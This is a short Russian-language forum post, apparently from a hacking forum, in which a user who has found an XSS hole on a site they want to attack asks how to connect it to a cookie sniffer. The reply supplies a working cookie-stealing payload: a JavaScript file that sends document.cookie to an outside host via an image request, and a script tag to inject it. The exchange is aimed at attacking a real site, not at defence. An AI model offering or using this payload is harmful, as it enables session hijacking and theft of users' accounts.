09.01.2010, 19:05
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами:
9100556
Репутация:
912
|
|
Сообщение от Nightmarе
Очередная проблемма.
Нашёл активную XSS на нужном мне сайте.
Ограничение в 50 символов + не позволяет писать слово script
Алерт то выводится нормально, а вот как на боевой сниффер подогнать, я хз, может как и можно, если да, то подскажите.
создай на своём хосте 1.js в него впиши
PHP код:
img=new Image(); img.src="http://site.ru/image.gif?"+document.cookie;
ну и где ты там нашел xss впиши :
PHP код:
<script src=http://site.ru/1.js></script>
|
|
|